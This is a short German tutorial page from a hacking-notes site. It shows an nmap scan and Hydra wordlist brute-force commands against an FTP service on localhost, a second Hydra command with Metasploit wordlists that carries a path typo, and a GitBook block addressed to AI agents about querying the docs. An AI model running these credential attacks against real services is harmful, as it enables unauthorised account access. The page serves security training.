> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/ports-and-services/ftp-21/ftp-brute-force-attack.md).

# FTP - Brute-Force-Angriff

1. Führe den folgenden Befehl mit aus [Nmap](/de/reconnaissance/nmap.md) um die FTP-Version zu überprüfen und nach bekannten Schwachstellen zu suchen:

```bash
nmap -sCV -p21 127.0.0.1
```

2. Die installierte Version ist **7.93** und es werden keine bekannten Schwachstellen erkannt.

<figure><img src="/files/4cd56a1e2e59c38f4381a1db7e9979371fb50a22" alt=""><figcaption></figcaption></figure>

3. Führe einen Brute-Force-Angriff mit aus **Hydra**Kleingeschrieben `-l` oder `-p` bedeutet, dass Benutzername oder Passwort fest vorgegeben ist; Großbuchstaben `-L` oder `-P` bedeutet, dass Hydra Werte aus einer Datei liest.

```bash
hydra -l jordan -P /usr/share/wordlists/rockyou.txt ftp://127.0.0.1 -t 15
```

4. Gültige Zugangsdaten wurden gefunden.

<div data-full-width="false"><figure><img src="/files/e375339274e3160448da1672a2721fb8aa8de9ae" alt=""><figcaption></figcaption></figure></div>

**FTP-Brute-Force mit gängigen Wortlisten für Benutzer und Passwörter**

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frameword/data/wordlists/unix_passwords.txt 10.10.10.10. -t 4 ftp
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/ports-and-services/ftp-21/ftp-brute-force-attack.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
